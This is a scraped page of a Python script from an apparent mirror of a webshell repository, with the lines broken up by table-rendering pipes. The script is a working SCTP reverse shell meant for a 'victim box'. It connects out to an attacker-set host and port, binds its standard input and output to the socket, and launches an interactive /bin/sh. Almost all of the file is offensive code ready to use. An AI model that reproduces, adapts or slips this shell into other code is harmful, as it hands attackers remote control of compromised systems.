mirror of
https://github.com/tennc/webshell
synced 2024-11-23 03:33:03 +00:00
36 lines
910 B
Python
36 lines
910 B
Python
#!/usr/bin/python
|
|
# SCTP Reverse Shell (TCP mode)
|
|
# Requires pysctp and sctp to be working
|
|
# on the victim box.
|
|
# My perfect saturday... Involves #
|
|
# infodox - Insecurety Research 2013
|
|
# insecurety.net | @info_dox
|
|
|
|
# I probably imported too much things. Who cares.
|
|
import socket
|
|
import _sctp
|
|
import sctp
|
|
from sctp import *
|
|
import os
|
|
import subprocess
|
|
|
|
host = '127.0.0.1' # CHANGEME
|
|
port = 1337 # CHANGEME
|
|
|
|
socket.setdefaulttimeout(60)
|
|
s = None
|
|
try:
|
|
s = sctpsocket_tcp(socket.AF_INET)
|
|
s.connect((host,port))
|
|
s.send('g0tsh3ll!\n')
|
|
save = [ os.dup(i) for i in range(0,3) ]
|
|
os.dup2(s.fileno(),0)
|
|
os.dup2(s.fileno(),1)
|
|
os.dup2(s.fileno(),2)
|
|
shell = subprocess.call(["/bin/sh","-i"])
|
|
[ os.dup2(save[i],i) for i in range(0,3)]
|
|
[ os.close(save[i]) for i in range(0,3)]
|
|
os.close(s.fileno())
|
|
except Exception:
|
|
print "Connection Failed! Is there even a listener?"
|
|
pass
|